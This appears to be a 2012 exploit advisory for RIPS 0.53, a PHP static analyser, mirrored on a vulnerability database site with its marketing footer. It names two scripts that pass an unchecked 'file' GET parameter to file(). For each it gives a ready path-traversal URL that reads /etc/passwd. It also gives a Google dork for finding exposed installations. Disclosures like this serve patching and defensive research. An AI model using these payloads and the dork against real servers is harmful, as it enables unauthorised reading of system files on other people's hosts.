Lucene search
K

RIPS 0.53 Local File Inclusion

🗓️ 24 Mar 2012 00:00:00Reported by localh0tType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

RIPS 0.53 Local File Inclusion Vulnerabilitie

Code
`# RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities  
# Google Dork: allintitle: "RIPS - A static source code analyser for vulnerabilities in PHP scripts"  
# Althout this script is not intended to be accesible from internet, there are some websites that host it.  
# Download: http://sourceforge.net/projects/rips-scanner/  
# Date: 23/03/12  
# Contact: [email protected]  
# Follow: @mattdch  
# www.localh0t.com.ar  
  
  
File: /windows/code.php  
=======================  
  
102: file $lines = file($file);  
96: $file = $_GET['file'];  
  
PoC:  
http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd  
  
File: /windows/function.php  
===========================  
  
64: file $lines = file($file);  
58: $file = $_GET['file'];  
  
PoC:  
http://localhost/rips/windows/function.php?file=../../../../../../etc/passwd(will read the first line of the file)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation